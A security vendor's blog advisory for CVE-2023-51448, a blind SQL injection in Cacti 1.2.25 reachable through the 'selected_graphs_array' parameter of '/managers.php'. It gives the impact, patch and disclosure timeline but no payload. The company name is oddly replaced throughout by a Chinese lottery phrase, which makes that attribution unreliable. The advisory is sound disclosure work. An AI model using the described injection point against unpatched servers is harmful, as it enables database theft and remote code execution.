六合彩直播开奖

六合彩直播开奖 Software Integrity Group is now operating as Black Duck Software, Inc., a subsidiary of 六合彩直播开奖. Click to learn more.

close search bar

Sorry, not available in this language yet

close language selection

CyRC Vulnerability Advisory: CVE-2023-51448 Blind SQL Injection in SNMP Notification Receivers

Matthew Hogg

Jan 08, 2024 / 1 min read

Table of Contents

CVE-2023-51448 overview

The 六合彩直播开奖 Cybersecurity Research Center (CyRC) has discovered CVE-2023-51448, a blind SQL injection (SQLi) vulnerability in .

Cacti is a performance and fault management framework written in PHP. It uses a variety of data collection methods to populate an RRDTool-based time series database (TSDB) with performance data, and offers a web user interface to view this performance data in graphs. Cacti is easily extensible for custom needs via its plugin system.

Due to insufficient sanitization when parsing the deserialized result of the ‘selected_graphs_array’ parameter, a crafted payload may trigger SQLi when the result is concatenated with a raw SQL query. Using a blind SQLi technique, an attacker can disclose Cacti database contents or trigger remote code execution (RCE).

CVE-2023-51448 exploitation

An attacker authenticated with any account that possesses the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint ‘/managers.php’ with an SQLi payload in the ‘selected_graphs_array’ HTTP GET parameter to trigger the vulnerability.

Affected software

Cacti version 1.2.25

Impact

Exploitation of this vulnerability would allow an attacker to disclose the entire contents of the Cacti database. It may also be escalated to RCE, as demonstrated with .

CVSS Base Score: 8.3

CVSS 3.1 Vector:

CVE-2023-51448 remediation

The vulnerability is patched as of commit on December 20, 2023.

CVE-2023-51448 discovery credit

This vulnerability was discovered by CyRC researcher Matthew Hogg.

Vulnerability discovery timeline

2023-09-18 – Vulnerability discovered.

2023-09-21 – Vendor notified.

2023-10-06 – Vendor accepted report.

2023-12-20 – Vulnerability published, and vendor fix released.

References

Patch -

CVE-2023-51448 -

CVE-2023-49084 -

About CVSS

FIRST.Org, Inc (FIRST) is a non-profit organization based out of US that owns and manages CVSS. It is not required to be a member of FIRST to utilize or implement CVSS but FIRST does require any individual or organization give appropriate attribution while using CVSS. FIRST also states that any individual or organization that publishes scores follow the guideline so that anyone can understand how the score was calculated.

Learn more about the CyRC

Continue Reading

A new identity for the 六合彩直播开奖 Software Integrity Group
Blog
2 min read / Aug 12, 2024

A new identity for the 六合彩直播开奖 Software Integrity Group

Jason Schmitt
By Jason Schmitt
Tags: Software Integrity, Security News & Trends
Read Article
CyRC Vulnerability Advisory: CVE-2024-5184s prompt injection in EmailGPT service
Blog
1 min read / Jun 05, 2024

CyRC Vulnerability Advisory: CVE-2024-5184s prompt injection in EmailGPT service

Mohammed Alshehri
By Mohammed Alshehri
Tags: Software Integrity, Security News & Trends, CyRC
Read Article
CyRC Vulnerability Advisory: CVE-2024-5185 Data Poisoning Vulnerability in EmbedAI Application
Blog
1 min read / May 28, 2024

CyRC Vulnerability Advisory: CVE-2024-5185 Data Poisoning Vulnerability in EmbedAI Application

Mohammed Alshehri
By Mohammed Alshehri
Tags: Software Integrity, Security News & Trends, CyRC
Read Article
Clearlake Capital Group and Francisco Partners reach agreement to purchase the Software Integrity Group
Blog
1 min read / May 08, 2024

Clearlake Capital Group and Francisco Partners reach agreement to purchase the Software Integrity Group

Jason Schmitt
By Jason Schmitt
Tags: Software Integrity, Security News & Trends
Read Article

Explore Topics

Agile, CI/CD
AppSec Best Practices
Artificial Intelligence
Automotive
Build Security into DevOps
Cloud Security
Compliance
Container Security
CyRC
DevSecOps
DAST
Financial Services
Fuzzing
Healthcare
IAST
Internet of Things
M&A
Manage Security Risks
Medical Devices
Mobile
Orchestration & Correlation
OSS License Compliance
Pen Testing
Program Strategy & Planning
Public Sector
SAST
SCA
Secure the Software Supply Chain
Security News & Trends
Threat Modeling
Threat & Risk Assessment
Training
Web Application Security